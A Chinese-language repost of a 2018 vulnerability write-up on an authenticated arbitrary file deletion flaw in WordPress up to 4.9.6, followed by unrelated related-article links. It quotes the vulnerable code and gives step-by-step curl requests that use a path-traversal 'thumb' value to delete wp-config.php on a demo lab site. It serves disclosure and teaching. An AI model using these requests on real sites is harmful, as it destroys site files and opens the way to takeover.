Wordpress <= 4.9.6 任意文件删除漏洞

本文转载自:Wordpress <= 4.9.6 任意文件删除漏洞 -http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility/

Wordpress <= 4.9.6 任意文件删除漏洞

WordPress是如今使用最为广泛的一套内容管理系统。根据 w3tech 统计,全世界大概有30%的网站运行着WordPress程序。

昨日RIPS团队公开了一个Wordpress的任意文件删除漏洞(需要登录),目前该漏洞仍然未修复(2018年06月27日),该漏洞影响 Wordpress 最新版 4.9.6.

本文我们将结合 VulnSpy 的在线 WordPress 环境来演示该漏洞的利用。

VulnSpy Wordpress 4.9 在线环境: http://www.vulnspy.com/wordpress-4.9/wordpress_4.9/

漏洞分析

  1. 文件wp-includes/post.php中:

123456789101112131415

function wp_delete_attachment( $post_id, $force_delete = false ) { ... $meta = wp_get_attachment_metadata( $post_id ); ... if ( ! empty($meta['thumb']) ) { // Don't delete the thumb if another attachment uses it. if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) { $thumbfile = str_replace(basename($file), $meta['thumb'], $file); /** This filter is documented in wp-includes/functions.php */ $thumbfile = apply_filters( 'wp_delete_file', $thumbfile ); @ unlink( path_join($uploadpath['basedir'], $thumbfile) ); } } ...}

$meta['thumb']来自与数据库,是图片的属性之一。代码未检查$meta['thumb']的内容,直接带入unlink函数,如果$meta['thumb']可控则可导致文件删除。

  1. 文件/wp-admin/post.php中:

123456789101112

...switch($action) {... case 'editattachment': check_admin_referer('update-post_' . $post_id); ... // Update the thumbnail filename $newmeta = wp_get_attachment_metadata( $post_id, true ); $newmeta['thumb'] = $_POST['thumb']; wp_update_attachment_metadata( $post_id, $newmeta );...

$newmeta['thumb']来自于$_POST[‘thumb’],未经过滤直接将其存入数据库,即上一步的$meta['thumb']可控。

详细分析可见:WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

漏洞利用

1. 使用VSPlate安装你的Wordpress 4.9

Wordpress 4.9 在线环境: http://www.vulnspy.com/wordpress-4.9/wordpress_4.9/

Wordpress AFD

2. 登录后台,添加媒体

访问 http://9c9b.vsplate.me/wp-admin/upload.php, 上传任意图片.

Wordpress AFD

3. 将 $meta[‘thumb’] 设置为我们要删除的文件

3.1 点击第二步中我们上传的图片, 并记住图片ID.

Wordpress AFD

3.2 访问 http://9c9b.vsplate.me/wp-admin/post.php?post=4&action=edit. 在网页源代码中找到 _wpnonce.

Wordpress AFD

3.3 发送Payload:

1

curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'

Wordpress AFD

4. 删除文件

4.1 在网页源码中找到另外一个 _wpnonce.

Wordpress AFD

4.2 发送Payload:

1

curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'

Wordpress AFD

5. 刷新网页

已经可以重装网站。

Wordpress AFD

原文链接:http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility/

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏杨建荣的学习笔记

shell的图形化实现简单示例(r3笔记第70天)

shell脚本一直以来就给人呆板枯燥的感觉。如果来点图形的感觉可能大家对shell的感觉就会多加分。其实在linux中已经有人做了不少的工作,目前使用比较多的是...

3046
来自专栏上善若水

025android初级篇之Android am命令的实现

am命令一个重要的调试工具,主要功能包括如下: 启动停止Activity Service,启动Broadcast, 查看管理这些信息。

2076
来自专栏分享达人秀

四大组件的纽带——Intent

前面学习Activity时己经多次使用了 Intent,当一个Activity需要启动另一个Activity时, 程序并没有直接告诉系统要启动哪个Act...

2135
来自专栏非著名程序员

Android 图片选择到裁剪之步步深坑

前言 最近在自己的项目里实现了一个头像选择的功能,就是先从相册里选取一张图片再调用系统的裁剪功能来制作头像,效果就像下面这样: ? 本以为很小的一个功能,却远远...

3248
来自专栏非著名程序员

Android调用手机中的应用市场,去评分的功能实现

在我们常常使用的软件当中,我们经常可以看到在软件的设置界面,有一个功能那就是去评分的功能,只要我们一点击“去评分”就会调用手机中的应用市场软件。一开始我以为这个...

1985
来自专栏移动开发

Andorid检测支付宝客户端是否安装

1164
来自专栏向治洪

软件更新时候出现和原包名冲突

如果你是一个开发人员,那么出现这个问题可能是因为,较旧的版本你是使用eclipse自动发布到模拟器上的,而eclipse自动发布时使用的是一个测试用签名,这个签...

1856
来自专栏IMWeb前端团队

抛弃 IE8,这是我们做的一个艰难的决定

距离我们抛弃 IE6、7 已经两年多了,我们就一直眼巴巴的想着什么时候可以抛弃 IE8,然后就在上个月,我们决定开始抛弃 IE8 了,原因是我们的 ...

2026
来自专栏码农笔录

Android N 7.0 上安装apk问题

1183
来自专栏吴伟祥

Springboot官方构建下的mvnw.cmd的作用

mvnw 全名是maven wrapper,它的原理是在maven-wrapper.properties文件中记录你要使用的maven版本

1472

扫码关注云+社区